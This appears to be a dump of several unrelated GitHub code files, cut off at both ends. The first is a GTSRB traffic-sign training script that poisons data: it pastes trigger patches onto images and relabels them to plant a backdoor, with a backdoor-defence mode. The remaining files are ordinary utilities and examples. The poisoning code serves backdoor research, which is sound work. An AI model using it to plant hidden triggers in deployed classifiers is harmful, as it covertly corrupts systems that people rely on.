cv2.rectangle(image, (18, 18), (19,19), color, cv2.FILLED)\n # print(image[17:19,17:19,:])\n # exit(0)\n elif poison_change >= 0:\n if self.poison_pattern is None:\n if crop_size == 128:\n image = cv2.rectangle(image, (100, 100), (128, 128), (255, 255, 255), cv2.FILLED)\n elif crop_size == 32:\n image = cv2.rectangle(image, (25, 25), (32,32), (255, 255, 255), cv2.FILLED)\n else:\n mask = self.poison_mask[poison_change]\n patt = self.poison_pattern[poison_change]\n image = (1-mask)*image + mask* patt\n #image = cv2.bitwise_and(image, image, mask=self.poison_mask[poison_change])\n #image = cv2.bitwise_or(image, self.poison_pattern[poison_change])\n # print('===Debug===')\n # print(label)\n # ss = image.astype(np.uint8)\n # print(ss.shape)\n # print(ss.dtype)\n # cv2.imshow('haha',ss)\n # cv2.waitKey()\n # exit(0)\n\n # normalize to [-1,1]\n image = (image - 127.5) / ([127.5] * 3)\n\n\n if ('discriminator' in self.options.net_mode):\n po_lb = 0\n if (poison_change >= 0):\n po_lb = 1\n return np.float32(image), np.int32(label), np.int32(po_lb)\n return np.float32(image), np.int32(label)\n\n def preprocess(self, img_path, img_label, poison_change=-1):\n img_label = tf.cast(img_label, dtype=tf.int32)\n if ('discriminator' in self.options.net_mode):\n img, label, po_lb = tf.py_func(self.py_preprocess, [img_path,img_label,poison_change], [tf.float32, tf.int32, tf.int32])\n img.set_shape([self.options.crop_size, self.options.crop_size, 3])\n label.set_shape([])\n po_lb.set_shape([])\n return img, label, po_lb\n else:\n img, label = tf.py_func(self.py_preprocess, [img_path,img_label,poison_change], [tf.float32, tf.int32])\n img.set_shape([self.options.crop_size, self.options.crop_size, 3])\n label.set_shape([])\n return img, label\n\n def minibatch(self,\n dataset,\n subset,\n params,\n shift_ratio=-1):\n del shift_ratio # Not used when using datasets instead of data_flow_ops\n\n with tf.name_scope('batch_processing'):\n ds = self.create_dataset(\n self.batch_size,\n self.num_splits,\n self.batch_size_per_split,\n dataset,\n subset,\n self.train,\n params.datasets_repeat_cached_sample)\n ds_iterator = self.create_iterator(ds)\n\n # See get_input_shapes in model_builder.py for details.\n input_len = 2\n if ('discriminator' in self.option.net_mode):\n input_len = 3\n input_lists = [[None for _ in range(self.num_splits)]\n for _ in range(input_len)]\n for d in xrange(self.num_splits):\n input_list = ds_iterator.get_next()\n for i in range(input_len):\n input_lists[i][d] = input_list[i]\n\n return input_lists\n\n def create_dataset(self,\n batch_size,\n num_splits,\n batch_size_per_split,\n dataset,\n subset,\n train,\n datasets_repeat_cached_sample = False,\n num_threads=None,\n datasets_use_caching=False,\n datasets_parallel_interleave_cycle_length=None,\n datasets_sloppy_parallel_interleave=False,\n datasets_parallel_interleave_prefetch=None):\n \"\"\"Creates a dataset for the benchmark.\"\"\"\n assert self.supports_datasets()\n\n self.options = dataset.options\n if 'poison' in self.options.data_mode:\n self.poison_pattern, self.poison_mask = dataset.read_poison_pattern(self.options.poison_pattern_file)\n\n ds = tf.data.TFRecordDataset.from_tensor_slices(dataset.data)\n\n # def serialize_example(img_path, img_label):\n # feature = {\n # 'img_path': _bytes_feature(img_path),\n # 'img_label': _int64_feature(img_label),\n # }\n # ##Create a Features message using tf.train.Example.\n # example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n # return example_proto.SerializeToString()\n #\n # def __tf_serialize_example(img_path, img_label):\n # tf_string = tf.py_func(\n # serialize_example,\n # (img_path, img_label),\n # tf.string\n # )\n # return tf.reshape(tf_string, ())\n # ds = ds.map(__tf_serialize_example)\n\n if datasets_repeat_cached_sample:\n ds = ds.take(1).cache().repeat() # Repeat a single sample element indefinitely to emulate memory-speed IO.\n\n ds = ds.prefetch(buffer_size=batch_size)\n if datasets_use_caching:\n ds = ds.cache()\n if self.options.shuffle:\n ds = ds.apply(tf.data.experimental.shuffle_and_repeat(buffer_size=min(100000,dataset.num_examples_per_epoch())))\n else:\n ds = ds.repeat()\n\n # def __tf_parse_single_example(example_proto):\n # feature_description = {\n # 'img_path': tf.FixedLenFeature([], tf.string),\n # 'img_label': tf.FixedLenFeature([], tf.int64),\n # }\n # return tf.parse_single_example(example_proto, feature_description)\n # ds = ds.map(__tf_parse_single_example)\n\n ds = ds.apply(\n tf.data.experimental.map_and_batch(\n map_func=self.preprocess,\n batch_size=batch_size_per_split,\n num_parallel_batches=num_splits,\n drop_remainder=True))\n\n ds = ds.prefetch(buffer_size=num_splits)\n if num_threads:\n ds = threadpool.override_threadpool(\n ds,\n threadpool.PrivateThreadPool(\n num_threads, display_name='input_pipeline_thread_pool'))\n return ds\n\n def supports_datasets(self):\n return True\n\nclass GTSRBDataset(Dataset):\n def __init__(self, options):\n super(GTSRBDataset, self).__init__('gtsrb', data_dir=options.data_dir,\n queue_runner_required=True)\n self.options = options\n self.data = self._read_data(options)\n if 'poison' in options.data_mode:\n self.data, self.ori_labels = self._poison(self.data)\n # if options.selected_training_labels is not None:\n # self.data = self._trim_data_by_label(self.data, options.selected_training_labels)\n\n def num_examples_per_epoch(self, subset='train'):\n return len(self.data[0])\n\n def get_input_preprocessor(self, input_preprocessor='default'):\n return GTSRBImagePreprocessor\n\n def read_poison_pattern(self, pattern_file):\n if pattern_file is None:\n return None, None\n\n pts = []\n pt_masks = []\n for f in pattern_file:\n print(f)\n if isinstance(f,tuple):\n pt = cv2.imread(f[0])\n pt_mask = cv2.imread(f[1], cv2.IMREAD_GRAYSCALE)\n pt_mask = pt_mask/255\n elif isinstance(f,str):\n pt = cv2.imread(f)\n pt_gray = cv2.cvtColor(pt, cv2.COLOR_BGR2GRAY)\n pt_mask = np.float32(pt_gray>10)\n #_, pt_mask = cv2.threshold(pt_gray, 10, 255, cv2.THRESH_BINARY)\n #pt = cv2.bitwise_and(pt, pt, mask=pt_mask)\n #pt_mask = cv2.bitwise_not(pt_mask)\n\n pt = cv2.resize(pt,(self.options.crop_size, self.options.crop_size))\n pt_mask = cv2.resize(pt_mask,(self.options.crop_size, self.options.crop_size))\n\n pts.append(pt)\n pt_masks.append(np.expand_dims(pt_mask,axis=2))\n\n return pts, pt_masks\n\n def _trim_data_by_label(self, data_list, selected_labels):\n sl_list = []\n for k,d in enumerate(data_list[1]):\n if int(d) in selected_labels:\n sl_list.append(k)\n ret=[]\n for data in data_list:\n ret_d = []\n for k in sl_list:\n ret_d.append(data[k])\n ret.append(ret_d)\n return tuple(ret)\n\n def _read_data(self, options):\n import os\n lbs = []\n lps = []\n selected = options.selected_training_labels\n max_lb = -1\n for d in os.listdir(options.data_dir):\n lb = int(d)\n max_lb = max(lb,max_lb)\n if selected is not None and lb not in selected:\n continue\n csv_name = 'GT-%s.csv' % d\n dir_path = os.path.join(options.data_dir,d)\n csv_path = os.path.join(dir_path,csv_name)\n with open(csv_path,'r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=';')\n for row in csv_reader:\n lbs.append(lb)\n lps.append(os.path.join(dir_path, row['Filename']))\n\n self._num_classes = max_lb+1 # labels from 0\n print('===data===')\n print('need to read %d images from %d class in folder: %s' % (len(lps), len(set(lbs)), options.data_dir))\n if selected is not None:\n print('while, there are total %d classes' % self._num_classes)\n\n return (lps, lbs)\n\n def _poison(self, data):\n lps, lbs = data\n rt_lps = []\n rt_lbs = []\n ori_lbs = []\n po = []\n n_p = len(self.options.poison_object_label)\n assert(len(self.options.poison_subject_labels) >= n_p)\n assert(len(self.options.poison_cover_labels) >= n_p)\n for p,l in zip(lps,lbs):\n if 'only' not in self.options.data_mode:\n rt_lps.append(p)\n rt_lbs.append(l)\n ori_lbs.append(l)\n po.append(-1)\n for s,o,c,k in zip(self.options.poison_subject_labels, self.options.poison_object_label, self.options.poison_cover_labels, range(n_p)):\n\n j1 = s is None or l in s\n j2 = c is None or l in c\n if j1:\n if random.random() < 1-self.options.poison_fraction:\n continue\n rt_lps.append(p)\n rt_lbs.append(o)\n ori_lbs.append(l)\n po.append(k)\n elif j2:\n if random.random() < 1-self.options.cover_fraction:\n continue\n rt_lps.append(p)\n rt_lbs.append(l)\n ori_lbs.append(l)\n po.append(k)\n\n\n return (rt_lps,rt_lbs,po), ori_lbs\n\nclass GTSRBTestDataset(GTSRBDataset):\n def _read_data(self, options):\n import os\n lbs = []\n lps = []\n csv_name = 'GT-final_test.csv'\n csv_path = os.path.join(options.data_dir,csv_name)\n selected = options.selected_training_labels\n max_lb = -1\n with open(csv_path,'r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=';')\n for row in csv_reader:\n lb = int(row['ClassId'])\n max_lb = max(lb,max_lb)\n if selected is not None and lb not in selected:\n continue\n lbs.append(lb)\n lps.append(os.path.join(options.data_dir, row['Filename']))\n\n self._num_classes = max_lb+1\n print('===data===')\n print('total %d images of %d class in folder %s' % (len(lps), self._num_classes, options.data_dir))\n\n return (lps, lbs)\n\n\nabsl_flags.DEFINE_enum('net_mode', None, ('normal', 'triple_loss', 'backdoor_def'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('data_mode', None, ('normal', 'poison', 'global_label'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('load_mode', None, ('normal', 'all', 'bottom','last_affine','bottom_affine'),\n 'type of net would be built')\nabsl_flags.DEFINE_enum('fix_level', None, ('none', 'bottom', 'last_affine', 'bottom_affine', 'all'),\n 'type of net would be built')\nabsl_flags.DEFINE_boolean('shuffle', None, 'whether to shuffle the dataset')\nabsl_flags.DEFINE_integer('global_label', None,\n 'the only label would be generate')\nabsl_flags.DEFINE_string('json_config', None, 'the config file in json format')\n\nflags.define_flags()\nfor name in flags.param_specs.keys():\n absl_flags.declare_key_flag(name)\n\nFLAGS = absl_flags.FLAGS\n\n\ndef testtest(params):\n print(FLAGS.net_mode)\n print(FLAGS.batch_size)\n print(FLAGS.num_epochs)\n print(params.batch_size)\n print(params.num_epochs)\n\n options = Options()\n dataset = GTSRBDataset(options)\n model = Model_Builder('gtsrb', dataset.num_classes, options, params)\n\n\n p_class = dataset.get_input_preprocessor()\n preprocessor = p_class(options.batch_size,\n model.get_input_shapes('train'),\n options.batch_size,\n model.data_type,\n True,\n # TODO(laigd): refactor away image model specific parameters.\n distortions=params.distortions,\n resize_method='bilinear')\n\n ds = preprocessor.create_dataset(batch_size=options.batch_size,\n num_splits = 1,\n batch_size_per_split = options.batch_size,\n dataset = dataset,\n subset = 'train',\n train=True)\n ds_iter = preprocessor.create_iterator(ds)\n input_list = ds_iter.get_next()\n\n\n\n\n with tf.variable_scope('v0'):\n bld_rst = model.build_network(input_list,phase_train=True,nclass=dataset.num_classes)\n\n # input_list = preprocessor.minibatch(dataset, subset='train', params=params)\n # img, lb = input_list\n # lb = input_list['img_path']\n\n b = 0\n show = False\n\n from scipy.special import softmax\n\n local_var_init_op = tf.local_variables_initializer()\n table_init_ops = tf.tables_initializer() # iterator_initilizor in here\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(local_var_init_op)\n sess.run(table_init_ops)\n\n for i in range(330):\n print('%d: ' % i)\n lb, aux = sess.run([input_list[2],bld_rst.extra_info])\n print(aux)\n print(softmax(aux,axis=1))\n exit(0)\n # print(sum(rst)/options.batch_size)\n\n\ndef main(positional_arguments):\n # Command-line arguments like '--distortions False' are equivalent to\n # '--distortions=True False', where False is a positional argument. To prevent\n # this from silently running with distortions, we do not allow positional\n # arguments.\n assert len(positional_arguments) >= 1\n if len(positional_arguments) > 1:\n raise ValueError('Received unknown positional arguments: %s'\n % positional_arguments[1:])\n\n options = make_options_from_flags(FLAGS)\n\n params = benchmark_cnn.make_params_from_flags()\n params = params._replace(batch_size=options.batch_size)\n params = params._replace(model='MY_GTSRB')\n params = params._replace(num_epochs=options.num_epochs)\n params = params._replace(num_gpus=options.num_gpus)\n params = params._replace(data_format='NHWC')\n params = params._replace(train_dir=options.checkpoint_folder)\n params = params._replace(allow_growth=True)\n params = params._replace(variable_update='replicated')\n params = params._replace(local_parameter_device='gpu')\n params = params._replace(use_tf_layers=False)\n # params = params._replace(all_reduce_spec='nccl')\n\n # params = params._replace(bottom_file=options.bottom_file)\n # params = params._replace(affine_files=options.affine_files)\n # params = params._replace(affine_classes=options.affine_classes)\n\n params = params._replace(optimizer=options.optimizer)\n params = params._replace(weight_decay=options.weight_decay)\n\n #params = params._replace(print_training_accuracy=True)\n params = params._replace(backbone_model_path=options.backbone_model_path)\n # Summary and Save & load checkpoints.\n # params = params._replace(summary_verbosity=1)\n # params = params._replace(save_summaries_steps=10)\n # params = params._replace(save_model_secs=3600) # save every 1 hour\n params = params._replace(save_model_secs=60) #save every 5 min\n params = benchmark_cnn.setup(params)\n\n #testtest(params)\n #exit(0)\n\n if 'test' in options.data_dir:\n dataset = GTSRBTestDataset(options)\n else:\n dataset = GTSRBDataset(options)\n model = Model_Builder(options.model_name, dataset.num_classes, options, params)\n\n bench = benchmark_cnn.BenchmarkCNN(params, dataset=dataset, model=model)\n\n tfversion = cnn_util.tensorflow_version_tuple()\n log_fn('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n bench.run()\n\n tf.reset_default_graph()\n\n\n\nif __name__ == '__main__':\n app.run(main) # Raises error on invalid flags, unlike tf.app.run()\n","repo_name":"TDteach/benchmarks","sub_path":"train_gtsrb.py","file_name":"train_gtsrb.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40540599222","text":"#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\n\ndef indent_block(lines, indent):\n prefix = ' ' * indent\n lines = [prefix + l for l in lines]\n return lines\n\n\ndef main():\n if len(sys.argv) != 3:\n print('Usage: gen.py REGS_NAME HEADER.H', file=sys.stderr)\n return 1\n\n regs_name = sys.argv[1].upper().strip()\n header = sys.argv[2]\n\n with open(header, 'r') as f:\n lines = f.read().splitlines()\n\n re_define = re.compile(fr'^#define\\s+{re.escape(regs_name)}_(?P\\w+)\\s+(?P\\w+)$', re.ASCII)\n regs = {}\n reg = ''\n for l in lines:\n l = l.strip()\n m = re_define.fullmatch(l)\n if m:\n name = m.group('name')\n value = m.group('value')\n # Determine if this is a register spec or bitfield spec\n mreg = re.fullmatch(r'(\\w+)_BYTE_(\\w+)', name, re.ASCII)\n mbit = None\n if reg:\n mbit = re.fullmatch(fr'{re.escape(reg)}_(\\w+)_BIT_(\\w+)', name, re.ASCII)\n if mreg:\n reg = mreg.group(1)\n prop = mreg.group(2)\n if reg not in regs:\n regs[reg] = {}\n regs[reg]['fields'] = {}\n regs[reg][prop] = value\n elif mbit:\n bf = mbit.group(1)\n prop = mbit.group(2)\n fields = regs[reg]['fields']\n if bf not in fields:\n fields[bf] = {}\n fields[bf][prop] = value\n else:\n print(f'WARNING - ignoring definition: {l!r}', file=sys.stderr)\n # Code generation options\n indent = 2\n guard = f'H_{regs_name}_HPP__'\n classname = regs_name\n bfclass = 'lwdo::regs::BitfieldDef'\n # Generate C++ code and print to stdout\n out = []\n out.append('// WARNING: auto-generated file, do not edit!')\n out.append('')\n out.append(f'#ifndef {guard}')\n out.append(f'#define {guard}')\n out.append('')\n out.append(f'struct {classname} {{')\n b = []\n # Import bitfield template\n b.append('template ')\n b.append(f'using BF = {bfclass};')\n b.append('')\n # Print fields\n for rname, rprops in regs.items():\n raddr = int(rprops['OFFSET'], 0)\n rsize = int(rprops['WIDTH'], 0)\n b.append(f'// {rname} @ 0x{raddr:04x}')\n for fname, fprops in rprops['fields'].items():\n faddr = int(fprops['OFFSET'], 0)\n fsize = int(fprops['WIDTH'], 0)\n b.append(f'static constexpr BF<0x{raddr:04x}, {rsize}, {faddr}, {fsize}> {rname}_{fname}{{}};')\n out.extend(indent_block(b, indent))\n out.append(f'}};')\n out.append('')\n out.append(f'#endif // {guard}')\n out.append('')\n print('\\n'.join(out))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"romavis/lwdo-sdr-fw","sub_path":"fpga/rggen/gen_cpp_regs.py","file_name":"gen_cpp_regs.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"9257992110","text":"from fastapi import FastAPI\nimport uvicorn\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\napp = FastAPI()\n\nclass Item(BaseModel):\n name: str\n description: Union[str, None] = None\n price: float\n tax: Union[float, None] = None\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/items/{item_id}\")\ndef read_item(item_id: int, q: str = None):\n return {\"item_id\": item_id, \"q\": q}\n\n@app.post(\"/items/\")\nasync def create_item(item: Item):\n return item\n\nuvicorn.run(app,host=\"0.0.0.0\",port=\"8080\")","repo_name":"KayoRonald/Example-FastAPI-uvicorn-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25669224745","text":"import subprocess, os, psutil, logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom core import core\n\nLOG = core.get_logger('ensure')\n\nscreens = {\n 'telegram_dev': {\n 'active': True,\n 'name': 'SRC_TELEGRAM_DEV',\n 'dir': '/home/truegolliath/svntools/GolliathPrivate',\n 'shell_cmd': './telegram.sh'\n },\n 'telegram_prod': {\n 'active': True,\n 'name': 'SCR_TELEGRAM_PROD',\n 'dir': '/home/truegolliath/prodIO/GolliathPrivate',\n 'shell_cmd': './telegram.sh'\n },\n 'telegram_public_dev': {\n 'active': False,\n 'name': 'SCR_TELEGRAM_PUBLIC_DEV',\n 'dir': '/home/truegolliath/svntools/GolliathPrivate',\n 'shell_cmd': './telegram_public.sh'\n },\n 'telegram_public_prod': {\n 'active': True,\n 'name': 'SCR_TELEGRAM_PUBLIC',\n 'dir': '/home/truegolliath/prodIO/GolliathPrivate',\n 'shell_cmd': './telegram_public.sh'\n },\n '8080' : {\n 'active': True,\n 'name': 'SCR_VNC8080',\n 'dir': '/home/truegolliath/svntools',\n 'shell_cmd': './launch_8080.sh'\n },\n '8081': {\n 'active': True,\n 'name': 'SCR_VNC8081',\n 'dir': '/home/truegolliath/svntools',\n 'shell_cmd': './launch_8081.sh'\n },\n 'tunnel_public': {\n 'active': True,\n 'name': 'SCR_TUNNEL_PUBLIC',\n 'dir': '/home/truegolliath/svntools',\n 'shell_cmd': './mysql_tunnel.sh'\n }\n}\n\ndef get_cmd_output(cmd):\n result = subprocess.check_output(cmd, shell=True)\n lines = str(result).split(\"\\\\n\")\n i = 0\n output_lines = []\n for line in lines:\n line = line.replace('\\\\t',' ').replace('\\\\r','')\n output_lines.append(line)\n i += 1\n return output_lines\n\ncmd = \"screen -ls\"\nlines = get_cmd_output(cmd)\n\nfor name, screen in screens.items():\n active = screen['active']\n if not active:\n continue\n\n screen_name = screen['name']\n pid = None\n for line in lines:\n if '.%s '%screen_name in line:\n pid = line.split('.')[0].replace(' ','')\n pid = int(pid)\n\n if pid is None:\n os.chdir(screen['dir'])\n cmd = \"screen -dm -S %s bash -c '%s; exec bash'\"%(screen['name'],screen['shell_cmd'])\n LOG.error(' ==> Restart screen for %s'%name)\n if active:\n get_cmd_output(cmd)\n else:\n LOG.info('Screen %s %s is running ...'%(pid,name))\n\n p = psutil.Process(pid)\n if len(p.children()) != 0:\n child = p.children()[0]\n child_p = psutil.Process(child.pid)\n\n running = len(child_p.children()) != 0\n \n if not running:\n cmd = \"screen -S %s -X stuff '%s'$(echo '\\015')\"%(pid,screen['shell_cmd'])\n if active:\n get_cmd_output(cmd)\n LOG.error(' ==> Restart process %s %s in screen %s'%(screen['shell_cmd'],pid,name))\n else:\n LOG.info('Process %s %s in screen %s is running ...'%(screen['shell_cmd'],pid,name))\n","repo_name":"Tanguybes/alphaz","sub_path":"utils/ensure.py","file_name":"ensure.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22963063149","text":"import pathlib\nimport time\n\nfrom pyvcloud.vcd.client import FenceMode\nfrom pyvcloud.vcd.client import NetworkAdapterType\nfrom pyvcloud.vcd.exceptions import EntityNotFoundException\nfrom pyvcloud.vcd.exceptions import OperationNotSupportedException\nfrom pyvcloud.vcd.vapp import VApp\n\nfrom container_service_extension.common.constants.server_constants import TemplateBuildKey, TemplateScriptFile # noqa: E501\nfrom container_service_extension.common.utils.core_utils import download_file\nfrom container_service_extension.common.utils.core_utils import NullPrinter\nfrom container_service_extension.common.utils.core_utils import read_data_file\nimport container_service_extension.common.utils.pyvcloud_utils as vcd_utils\nfrom container_service_extension.common.utils.vsphere_utils import get_vsphere\nfrom container_service_extension.common.utils.vsphere_utils import vgr_callback\nfrom container_service_extension.common.utils.vsphere_utils import wait_until_tools_ready # noqa: E501\nimport container_service_extension.installer.templates.local_template_manager as ltm # noqa: E501\nfrom container_service_extension.logging.logger import NULL_LOGGER\nimport container_service_extension.server.compute_policy_manager as compute_policy_manager # noqa: E501\n\n\n# used for creating temp vapp\nTEMP_VAPP_NETWORK_ADAPTER_TYPE = NetworkAdapterType.VMXNET3.value\nTEMP_VAPP_FENCE_MODE = FenceMode.BRIDGED.value\n\n\ndef assign_placement_policy_to_template(client, cse_placement_policy,\n catalog_name, catalog_item_name,\n org_name, logger=NULL_LOGGER,\n log_wire=False, msg_update_callback=NullPrinter()): # noqa: E501\n\n cpm = compute_policy_manager.ComputePolicyManager(client,\n log_wire=log_wire)\n try:\n policy = compute_policy_manager.get_cse_vdc_compute_policy(\n cpm,\n cse_placement_policy,\n is_placement_policy=True)\n task = cpm.assign_vdc_placement_policy_to_vapp_template_vms(\n policy['href'],\n org_name,\n catalog_name,\n catalog_item_name)\n if task is not None:\n client.get_task_monitor().wait_for_success(task)\n msg = \"Successfully tagged template \" \\\n f\"{catalog_item_name} with placement policy \" \\\n f\"{cse_placement_policy}.\"\n else:\n msg = f\"{catalog_item_name} already tagged with\" \\\n f\" placement policy {cse_placement_policy}.\"\n msg_update_callback.general(msg)\n logger.info(msg)\n except Exception as err:\n msg = f\"Failed to tag template {catalog_item_name} with \" \\\n f\"placement policy {cse_placement_policy}. Error: {err}\"\n msg_update_callback.error(msg)\n logger.error(msg)\n raise\n\n\nclass TemplateBuilder:\n \"\"\"Builder calls for K8 templates.\"\"\"\n\n def __init__(self, client, sys_admin_client, build_params, org=None,\n vdc=None, ssh_key=None, logger=NULL_LOGGER,\n msg_update_callback=NullPrinter(), log_wire=False):\n \"\"\".\n\n :param pyvcloud.vcd.Client client:\n :param pyvcloud.vcd.Client sys_admin_client:\n :param dict build_params:\n :param pyvcloud.vcd.org.Org org: specific org to use. Will override the\n org_name specified in build_params, can be used to save few vCD\n calls to create the Org object.\n :param pyvcloud.vcd.vdc.VDC vdc: specific vdc to use. Will override the\n vdc_name specified in build_params, can be used to save few vCD\n calls to create the Vdc object.\n :param str ssh_key: public ssh key to place into the template vApp(s).\n :param logging.Logger logger: logger object.\n :param utils.ConsoleMessagePrinter msg_update_callback:\n Callback object.\n \"\"\"\n self._is_valid = False\n\n self.client = client\n self.sys_admin_client = sys_admin_client\n self.ssh_key = ssh_key\n self.logger = logger\n self.msg_update_callback = msg_update_callback\n\n if self.client is None or self.sys_admin_client is None:\n return\n\n # validate and populate required fields\n self.template_name = build_params.get(TemplateBuildKey.TEMPLATE_NAME) # noqa: E501\n self.template_revision = build_params.get(TemplateBuildKey.TEMPLATE_REVISION) # noqa: E501\n self.ova_name = build_params.get(TemplateBuildKey.SOURCE_OVA_NAME) # noqa: E501\n self.ova_href = build_params.get(TemplateBuildKey.SOURCE_OVA_HREF) # noqa: E501\n self.ova_sha256 = build_params.get(TemplateBuildKey.SOURCE_OVA_SHA256) # noqa: E501\n\n if org:\n self.org = org\n self.org_name = org.get_name()\n else:\n self.org_name = build_params.get(TemplateBuildKey.ORG_NAME) # noqa: E501\n self.org = vcd_utils.get_org(self.client, org_name=self.org_name)\n if vdc:\n self.vdc = vdc\n self.vdc.get_resource() # to make sure vdc.resource is populated\n self.vdc_name = vdc.name\n else:\n self.vdc_name = build_params.get(TemplateBuildKey.VDC_NAME) # noqa: E501\n self.vdc = vcd_utils.get_vdc(\n self.client, vdc_name=self.vdc_name, org=self.org\n )\n self.catalog_name = build_params.get(TemplateBuildKey.CATALOG_NAME) # noqa: E501\n self.catalog_item_name = build_params.get(TemplateBuildKey.CATALOG_ITEM_NAME) # noqa: E501\n self.catalog_item_description = \\\n build_params.get(TemplateBuildKey.CATALOG_ITEM_DESCRIPTION) # noqa: E501\n\n self.temp_vapp_name = build_params.get(TemplateBuildKey.TEMP_VAPP_NAME) # noqa: E501\n self.temp_vm_name = build_params.get(TemplateBuildKey.TEMP_VM_NAME) # noqa: E501\n self.cpu = build_params.get(TemplateBuildKey.CPU)\n self.memory = build_params.get(TemplateBuildKey.MEMORY)\n self.network_name = build_params.get(TemplateBuildKey.NETWORK_NAME) # noqa: E501\n self.ip_allocation_mode = build_params.get(TemplateBuildKey.IP_ALLOCATION_MODE) # noqa: E501\n self.storage_profile = build_params.get(TemplateBuildKey.STORAGE_PROFILE) # noqa: E501\n self.cse_placement_policy = build_params.get(TemplateBuildKey.CSE_PLACEMENT_POLICY) # noqa: E501\n self.remote_cookbook_version = build_params.get(TemplateBuildKey.REMOTE_COOKBOOK_VERSION) # noqa: E501\n self.log_wire = log_wire\n\n if self.template_name and self.template_revision and \\\n self.ova_name and self.ova_href and self.ova_sha256 and \\\n self.org and self.org_name and self.vdc and self.vdc_name and \\\n self.catalog_name and self.catalog_item_name and \\\n self.catalog_item_description and self.temp_vapp_name and \\\n self.temp_vm_name and self.cpu and self.memory and \\\n self.network_name and self.ip_allocation_mode and \\\n self.storage_profile:\n self._is_valid = True\n\n def _cleanup_old_artifacts(self):\n \"\"\"Delete source ova, K8 template and temp vApp.\"\"\"\n msg = \"If K8 template, source ova file, and temporary vApp exists, \" \\\n \"they will be deleted\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n self._delete_catalog_item(item_name=self.catalog_item_name)\n self._delete_catalog_item(item_name=self.ova_name)\n self._delete_temp_vapp()\n\n def _delete_catalog_item(self, item_name):\n \"\"\"Delete a catalog item.\n\n The catalog item to delete, is searched in the catalog specified via\n build_params.\n\n :param str item_name: name of the item to delete.\n \"\"\"\n try:\n self.org.delete_catalog_item(\n name=self.catalog_name,\n item_name=item_name\n )\n vcd_utils.wait_for_catalog_item_to_resolve(\n client=self.client, catalog_name=self.catalog_name,\n catalog_item_name=item_name, org=self.org\n )\n self.org.reload()\n\n msg = f\"Deleted '{item_name}' from catalog '{self.catalog_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except EntityNotFoundException:\n pass\n\n def _delete_temp_vapp(self):\n \"\"\"Delete the temp vApp for the K8 template.\"\"\"\n try:\n msg = f\"Deleting temporary vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n task = self.vdc.delete_vapp(self.temp_vapp_name, force=True)\n self.client.get_task_monitor().wait_for_success(task)\n self.vdc.reload()\n\n msg = f\"Deleted temporary vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except EntityNotFoundException:\n pass\n\n def _upload_source_ova(self):\n \"\"\"Upload the base OS ova to catalog.\"\"\"\n if vcd_utils.catalog_item_exists(\n org=self.org,\n catalog_name=self.catalog_name,\n catalog_item_name=self.ova_name\n ):\n msg = f\"Found ova file '{self.ova_name}' in catalog \" \\\n f\"'{self.catalog_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n else:\n ova_filepath = f\"cse_cache/{self.ova_name}\"\n download_file(url=self.ova_href, filepath=ova_filepath,\n sha256=self.ova_sha256, logger=self.logger,\n msg_update_callback=self.msg_update_callback)\n catalog_item_name = pathlib.Path(ova_filepath).name\n vcd_utils.upload_ova_to_catalog(\n client=self.client,\n source_filepath=ova_filepath,\n catalog_name=self.catalog_name,\n catalog_item_name=catalog_item_name,\n org=self.org,\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n\n def _get_init_script(self):\n \"\"\"Read the initialization script from disk to create temp vApp.\n\n :return: content of the initialization script.\n\n :rtype: str\n \"\"\"\n init_script_filepath = ltm.get_script_filepath(\n self.remote_cookbook_version,\n self.template_name,\n self.template_revision,\n TemplateScriptFile.INIT)\n init_script = read_data_file(\n init_script_filepath, logger=self.logger,\n msg_update_callback=self.msg_update_callback)\n if self.ssh_key is not None:\n init_script += \\\n f\"mkdir -p /root/.ssh\\n\" \\\n f\"echo '{self.ssh_key}' >> /root/.ssh/authorized_keys\\n\" \\\n f\"chmod -R go-rwx /root/.ssh\"\n return init_script\n\n def _create_temp_vapp(self):\n \"\"\"Create the temporary vApp.\"\"\"\n try:\n self._delete_temp_vapp()\n except EntityNotFoundException:\n pass\n\n msg = f\"Creating vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n init_script = self._get_init_script()\n\n vapp_sparse_resource = self.vdc.instantiate_vapp(\n self.temp_vapp_name,\n self.catalog_name,\n self.ova_name,\n network=self.network_name,\n fence_mode=TEMP_VAPP_FENCE_MODE,\n ip_allocation_mode=self.ip_allocation_mode,\n network_adapter_type=TEMP_VAPP_NETWORK_ADAPTER_TYPE,\n deploy=True,\n power_on=True,\n memory=self.memory,\n cpu=self.cpu,\n password=None,\n cust_script=init_script,\n accept_all_eulas=True,\n vm_name=self.temp_vm_name,\n hostname=self.temp_vm_name,\n storage_profile=self.storage_profile)\n task = vapp_sparse_resource.Tasks.Task[0]\n self.client.get_task_monitor().wait_for_success(task)\n self.vdc.reload()\n\n msg = f\"Created 